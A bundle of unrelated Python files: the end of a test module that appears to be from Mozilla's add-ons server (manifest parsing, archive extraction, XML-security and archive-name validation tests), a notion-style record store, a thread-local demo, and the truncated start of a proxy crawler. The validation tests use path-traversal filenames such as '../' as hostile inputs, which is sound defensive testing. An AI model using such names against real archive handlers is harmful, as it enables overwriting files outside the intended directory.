# onwards, now if the user specifies strict_min_compat as 42.0
# we shouldn't skip the app because of that. Instead we override the
# value with the known min version that started supporting that.
data = {
'browser_specific_settings': {
'gecko': {
'strict_min_version': '42.0',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
def test_devtools_page(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description",
"devtools_page": "devtools/my-page.html"
}
"""
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json_string).parse()
assert parsed_data['devtools_page'] == "devtools/my-page.html"
class TestLanguagePackAndDictionaries(AppVersionsMixin, TestCase):
def test_parse_langpack(self):
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
self.create_appversion('android', '60.0')
self.create_appversion('android', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '60.0'
assert apps[0].max.version == '60.*'
def test_parse_langpack_not_targeting_versions_explicitly(self):
data = {
'applications': {
'gecko': {
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '42.0'
# The linter should force the langpack to have a strict_max_version,
# so the value here doesn't matter much.
assert apps[0].max.version == '*'
def test_parse_dictionary(self):
self.create_appversion('firefox', '61.0')
data = {
'applications': {
'gecko': {
'id': '@dict'
}
},
'dictionaries': {'en-US': '/path/to/en-US.dic'}
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_DICT
assert parsed_data['strict_compatibility'] is False
assert parsed_data['is_webextension'] is True
assert parsed_data['target_locale'] == 'en-US'
apps = parsed_data['apps']
assert len(apps) == 1 # Dictionaries are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '61.0'
assert apps[0].max.version == '*'
def test_parse_broken_dictionary(self):
data = {
'dictionaries': {}
}
with self.assertRaises(forms.ValidationError):
utils.ManifestJSONExtractor('/fake_path', json.dumps(data)).parse()
def test_check_xpi_info_langpack_submission_restrictions(self):
user = user_factory()
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path.xpi', json.dumps(data)).parse()
with self.assertRaises(ValidationError):
# Regular users aren't allowed to submit langpacks.
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
# Shouldn't raise for users with proper permissions
self.grant_permission(user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
class TestManifestJSONExtractorStaticTheme(TestManifestJSONExtractor):
def parse(self, base_data):
if 'theme' not in base_data.keys():
base_data.update(theme={})
return super(
TestManifestJSONExtractorStaticTheme, self).parse(base_data)
def test_type(self):
assert self.parse({})['type'] == amo.ADDON_STATICTHEME
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
Override this because static themes have a higher default version.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '66.0')
firefox_max_version = self.create_appversion('firefox', '66.*')
android_min_version = self.create_appversion('android', '66.0')
android_max_version = self.create_appversion('android', '66.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=66.0',
'strict_max_version': '=66.*',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min == firefox_min_version
assert apps[0].max == firefox_max_version
assert apps[1].appdata == amo.ANDROID
assert apps[1].min == android_min_version
assert apps[1].max == android_max_version
def test_theme_json_extracted(self):
# Check theme data is extracted from the manifest and returned.
data = {'theme': {'colors': {'tab_background_text': "#3deb60"}}}
assert self.parse(data)['theme'] == data['theme']
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# In the parent class this method would bump the min_version to 48.0
# because that's the first version to support
# browser_specific_settings, but in static themes we bump it even
# higher because of the minimum version when we started supporting
# static themes themselves.
data = {
'browser_specific_settings': {
'gecko': {
'strict_min_version': '42.0',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
@pytest.mark.parametrize('filename, expected_files', [
('webextension_no_id.xpi', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.zip', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.tar.gz', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.tar.bz2', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('search.xml', [
'search.xml',
])
])
def test_extract_extension_to_dest(filename, expected_files):
extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
fname=filename)
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
temp_folder = utils.extract_extension_to_dest(extension_file)
assert sorted(os.listdir(temp_folder)) == expected_files
# fsync isn't called by default
assert not fsync_mock.called
@pytest.mark.parametrize('filename', [
'webextension_no_id.xpi', 'webextension_no_id.zip',
'webextension_no_id.tar.bz2', 'webextension_no_id.tar.gz', 'search.xml',
])
def test_extract_extension_to_dest_call_fsync(filename):
extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
fname=filename)
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
utils.extract_extension_to_dest(extension_file, force_fsync=True)
# fsync isn't called by default
assert fsync_mock.called
def test_extract_extension_to_dest_non_existing_archive():
extension_file = 'src/olympia/files/fixtures/files/doesntexist.zip'
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(FileNotFoundError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
def test_extract_extension_to_dest_invalid_archive():
extension_file = (
'src/olympia/files/fixtures/files/invalid-cp437-encoding.xpi'
)
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(forms.ValidationError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
@pytest.fixture
def file_obj():
addon = amo.tests.addon_factory()
addon.update(guid='xxxxx')
version = addon.current_version
return version.all_files[0]
@pytestmark
def test_bump_version_in_manifest_json(file_obj):
AppVersion.objects.create(application=amo.FIREFOX.id,
version=amo.DEFAULT_WEBEXT_MIN_VERSION)
AppVersion.objects.create(application=amo.FIREFOX.id,
version=amo.DEFAULT_WEBEXT_MAX_VERSION)
AppVersion.objects.create(application=amo.ANDROID.id,
version=amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
AppVersion.objects.create(application=amo.ANDROID.id,
version=amo.DEFAULT_WEBEXT_MAX_VERSION)
with amo.tests.copy_file(
'src/olympia/files/fixtures/files/webextension.xpi',
file_obj.file_path):
utils.update_version_number(file_obj, '0.0.1.1-signed')
parsed = utils.parse_xpi(file_obj.file_path)
assert parsed['version'] == '0.0.1.1-signed'
def test_extract_translations_simple(file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
messages = utils.extract_translations(file_obj)
assert list(sorted(messages.keys())) == [
'de', 'en-US', 'ja', 'nb-NO', 'nl', 'ru', 'sv-SE']
@mock.patch('olympia.files.utils.zipfile.ZipFile.read')
def test_extract_translations_fail_silent_invalid_file(read_mock, file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
read_mock.side_effect = KeyError
# Does not raise an exception
utils.extract_translations(file_obj)
read_mock.side_effect = IOError
# Does not raise an exception too
utils.extract_translations(file_obj)
# We don't fail on invalid JSON too, this is addons-linter domain
read_mock.side_effect = ValueError
utils.extract_translations(file_obj)
# But everything else...
read_mock.side_effect = TypeError
with pytest.raises(TypeError):
utils.extract_translations(file_obj)
def test_get_all_files():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
assert utils.get_all_files(tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
shutil.rmtree(tempdir)
assert not os.path.exists(tempdir)
def test_get_all_files_strip_prefix_no_prefix_silent():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, strip_prefix=tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, prefix='/foo/bar') == [
'/foo/bar' + os.path.join(tempdir, 'dir1'),
'/foo/bar' + os.path.join(tempdir, 'dir1', 'foo2'),
'/foo/bar' + os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix_with_strip_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
result = utils.get_all_files(
tempdir, strip_prefix=tempdir, prefix='/foo/bar')
assert result == [
os.path.join('/foo', 'bar', 'dir1'),
os.path.join('/foo', 'bar', 'dir1', 'foo2'),
os.path.join('/foo', 'bar', 'foo1'),
]
def test_lock_with_lock_attained():
with utils.lock(settings.TMP_PATH, 'test-lock-lock2') as lock_attained:
assert lock_attained
@contextlib.contextmanager
def _run_lock_holding_process(lock_name, sleep):
def _other_process_holding_lock():
with utils.lock(settings.TMP_PATH, lock_name) as lock_attained:
assert lock_attained
time.sleep(sleep)
other_process = multiprocessing.Process(target=_other_process_holding_lock)
other_process.start()
# Give the process some time to acquire the lock
time.sleep(0.2)
yield other_process
other_process.join()
def test_lock_timeout():
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting for 3 seconds allows us to attain the lock from the parent
# process.
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=3)
with lock as lock_attained:
assert lock_attained
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting only 1 second fails to acquire the lock
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=1)
with lock as lock_attained:
assert not lock_attained
def test_parse_search_empty_shortname():
from olympia.files.tests.test_file_viewer import get_file
fname = get_file('search_empty_shortname.xml')
with pytest.raises(forms.ValidationError) as excinfo:
utils.parse_search(fname)
assert (
str(excinfo.value.message) ==
'Could not parse uploaded file, missing or empty <ShortName> element')
class TestResolvei18nMessage(object):
def test_no_match(self):
assert utils.resolve_i18n_message('foo', {}, '') == 'foo'
def test_locale_found(self):
messages = {
'de': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de')
assert result == 'bar'
def test_uses_default_locale(self):
messages = {
'en-US': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message(
'__MSG_foo__', messages, 'de', 'en')
assert result == 'bar'
def test_no_locale_match(self):
# Neither `locale` or `locale` are found, "message" is returned
# unchanged
messages = {
'fr': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message(
'__MSG_foo__', messages, 'de', 'en')
assert result == '__MSG_foo__'
def test_field_not_set(self):
"""Make sure we don't fail on messages that are `None`
Fixes https://github.com/mozilla/addons-server/issues/3067
"""
result = utils.resolve_i18n_message(None, {}, 'de', 'en')
assert result is None
def test_field_no_string(self):
"""Make sure we don't fail on messages that are no strings"""
result = utils.resolve_i18n_message([], {}, 'de', 'en')
assert result == []
def test_corrects_locales(self):
messages = {
'en-US': {
'foo': {'message': 'bar'}
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == 'bar'
def test_ignore_wrong_format(self):
messages = {
'en-US': {
'foo': 'bar'
}
}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == '__MSG_foo__'
class TestXMLVulnerabilities(TestCase):
"""Test a few known vulnerabilities to make sure
our defusedxml patching is applied automatically.
This doesn't replicate all defusedxml tests.
"""
def test_quadratic_xml(self):
quadratic_xml = os.path.join(
os.path.dirname(__file__), '..', 'fixtures', 'files',
'quadratic.xml')
with pytest.raises(forms.ValidationError) as exc:
utils.extract_search(quadratic_xml)
assert exc.value.message == u'OpenSearch: XML Security error.'
def test_general_entity_expansion_is_disabled(self):
zip_file = utils.SafeZip(os.path.join(
os.path.dirname(__file__), '..', 'fixtures', 'files',
'xxe-example-install.zip'))
# This asserts that the malicious install.rdf blows up with
# a parse error. If it gets as far as this specific parse error
# it means that the external entity was not processed.
#
# Before the patch in files/utils.py, this would raise an IOError
# from the test suite refusing to make an external HTTP request to
# the entity ref.
with pytest.raises(EntitiesForbidden):
utils.RDFExtractor(zip_file)
def test_lxml_XMLParser_no_resolve_entities(self):
with pytest.raises(NotSupportedError):
lxml.etree.XMLParser(resolve_entities=True)
# not setting it works
lxml.etree.XMLParser()
# Setting it explicitly to `False` is fine too.
lxml.etree.XMLParser(resolve_entities=False)
class TestGetBackgroundImages(TestCase):
file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme.zip')
file_obj_dep = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_deprecated.zip')
def test_get_background_images(self):
data = {'images': {'theme_frame': 'weta.png'}}
images = utils.get_background_images(self.file_obj, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_deprecated(self):
data = {'images': {'headerURL': 'weta.png'}}
images = utils.get_background_images(self.file_obj_dep, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_no_theme_data_provided(self):
images = utils.get_background_images(self.file_obj, theme_data=None)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_missing(self):
data = {'images': {'theme_frame': 'missing_file.png'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_not_image(self):
self.file_obj = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_non_image.zip')
data = {'images': {'theme_frame': 'not_an_image.js'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_with_additional_imgs(self):
self.file_obj = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_tiled.zip')
data = {'images': {
'theme_frame': 'empty.png',
'additional_backgrounds': [
'transparent.gif', 'missing_&_ignored.png',
'weta_for_tiling.png']
}}
images = utils.get_background_images(self.file_obj, data)
assert len(images.items()) == 3
assert len(images['empty.png']) == 332
assert len(images['transparent.gif']) == 42
assert len(images['weta_for_tiling.png']) == 93371
# And again but only with the header image
images = utils.get_background_images(
self.file_obj, data, header_only=True)
assert len(images.items()) == 1
assert len(images['empty.png']) == 332
@pytest.mark.parametrize('value, expected', [
(1, '1/1/1'),
(1, '1/1/1'),
(12, '2/12/12'),
(123, '3/23/123'),
(123456789, '9/89/123456789'),
])
def test_id_to_path(value, expected):
assert utils.id_to_path(value) == expected
class TestSafeZip(TestCase):
def test_raises_error_for_invalid_webextension_xpi(self):
with pytest.raises(forms.ValidationError):
utils.SafeZip(get_addon_file('invalid_webextension.xpi'))
def test_raises_validation_error_when_uncompressed_size_is_too_large(self):
with override_settings(MAX_ZIP_UNCOMPRESSED_SIZE=1000):
with pytest.raises(forms.ValidationError):
# total uncompressed size of this xpi is: 2269 bytes
utils.SafeZip(get_addon_file(
'valid_firefox_and_thunderbird_addon.xpi'))
class TestArchiveMemberValidator(TestCase):
# We cannot easily test `archive_member_validator` so let's test
# `_validate_archive_member_name_and_size` instead.
def test_raises_when_filename_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(None, 123)
def test_raises_when_filesize_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('filename', None)
def test_raises_when_filename_is_dot_dot_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('../', 123)
def test_raises_when_filename_starts_with_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('/..', 123)
def test_raises_when_filename_is_dot_dot(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('..', 123)
def test_does_not_raise_when_filename_is_dot_dot_extension(self):
utils._validate_archive_member_name_and_size('foo..svg', 123)
@override_settings(FILE_UNZIP_SIZE_LIMIT=100)
def test_raises_when_filesize_is_above_limit(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(
'filename',
settings.FILE_UNZIP_SIZE_LIMIT + 100
)
|
store.py
|
import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
from inspect import signature
from multiprocessing import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
def __init__(self, callback, record, callback_id=None, extra_kwargs={}, watch_children=True):
self.callback = callback
self.record = record
self.callback_id = callback_id or str(uuid.uuid4())
self.extra_kwargs = extra_kwargs
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(difference, old_val, new_val)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error("Error while processing callback for {}: {}".format(repr(self.record), repr(e)))
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key or str(int(datetime.datetime.now().timestamp() * 1000))
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
def add_callback(self, record, callback, callback_id=None, extra_kwargs={}):
assert callable(callback), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
def _get_cache_path(self, attribute):
return str(Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute)))
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks("collection", collection_id, [("row_added", "rows", id)], old_ids, new_ids)
for id in removed:
self._trigger_callbacks("collection", collection_id, [("row_removed", "rows", id)], old_ids, new_ids)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug("Updating 'value' for {}/{} to {}".format(table, id, value))
old_val = self._values[table][id]
difference = list(diff(old_val, value, ignore=["version", "last_edited_time", "last_edited_by"], expand=True))
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
Call the server's getRecordValues endpoint to update the local record store. The keyword arguments map
table names into lists of (or singular) record IDs to load for that table. Use True to refresh all known
records for that table.
"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(set(self._records_to_refresh.get(table, []) + ids))
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug("Calling 'getRecordValues' endpoint for requests: {}".format(requestlist))
results = self._client.post("getRecordValues", {"requests": requestlist}).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(request["table"], request["id"], value=result.get("value"), role=result.get("role"))
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {"pageId": page_id, "limit": 100000, "cursor": {"stack": []}, "chunkNumber": 0, "verticalColumns": False}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
for id, record in records.items():
self._update_record(table, id, value=record.get("value"), role=record.get("role"))
def call_query_collection(self, collection_id, collection_view_id, search="", type="table", aggregate=[], filter=[], filter_operator="and", sort=[], calendar_by="", group_by=""):
# convert singletons into lists if needed
if isinstance(aggregate, dict):
aggregate = [aggregate]
if isinstance(filter, dict):
filter = [filter]
if isinstance(sort, dict):
sort = [sort]
data = {
"collectionId": collection_id,
"collectionViewId": collection_view_id,
"loader": {
"limit": 10000,
"loadContentCover": True,
"query": search,
"userLocale": "en",
"userTimeZone": str(get_localzone()),
"type": type,
},
"query": {
"aggregate": aggregate,
"filter": filter,
"filter_operator": filter_operator,
"sort": sort,
}
}
response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
|
threadLocal.py
|
# -*- coding: utf-8 -*-
import threading
local_school = threading.local()
def process_student():
print 'Hello, %s (in %s)' % (local_school.student, threading.current_thread().name)
def process_thread(name):
local_school.student = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice', ), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob', ), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
|
letmecrawl.py
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from six import with_metaclass
import json
import time
import logging
import threading
import pkg_resources
from .sources import Source
from .models import OrderedTable, Singleton
from random import shuffle
logger = logging.getLogger(__name__)
CURATE_RELOAD_TIME = 5 * 60 # seconds
def letmecrawl():
for proxy in LMC().pop():
yield proxy
def stop():
LMC().stop()
def curate():
resource_package = __name__
sources = '/sources.json'
sources_path = pkg_resources.resource_filename(resource_package, sources)
with open(sources_path) as f:
